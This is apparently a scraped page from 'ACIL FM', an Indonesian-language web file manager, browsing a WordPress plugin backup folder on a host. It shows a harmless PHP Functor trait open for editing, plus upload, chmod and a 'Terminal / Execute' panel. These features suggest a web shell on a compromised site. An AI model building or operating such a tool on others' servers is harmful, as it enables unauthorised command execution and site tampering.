ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/www/site BKP/wp-content/plugins/otgs-installer-plugin/fp/core/Functor
/
home
mhhtmff
www
site BKP
wp-content
plugins
otgs-installer-plugin
fp
core
Functor
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
Applicative.php
216 B
chmod
View
DL
Edit
Rename
Delete
ConstApplicative.php
190 B
chmod
View
DL
Edit
Rename
Delete
ConstFunctor.php
221 B
chmod
View
DL
Edit
Rename
Delete
Functor.php
423 B
chmod
View
DL
Edit
Rename
Delete
IdentityFunctor.php
259 B
chmod
View
DL
Edit
Rename
Delete
Pointed.php
461 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/www/site BKP/wp-content/plugins/otgs-installer-plugin/fp/core/Functor/Functor.php
<?php namespace WPML\INSTALLER\FP\Functor; trait Functor { /** @var mixed */ protected $value; /** * @param mixed $value */ public function __construct( $value ) { $this->value = $value; } /** * @return mixed */ public function get() { return $this->value; } /** * @param callable $callback * * @return \WPML\INSTALLER\FP\Either */ abstract public function map( callable $callback ); }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply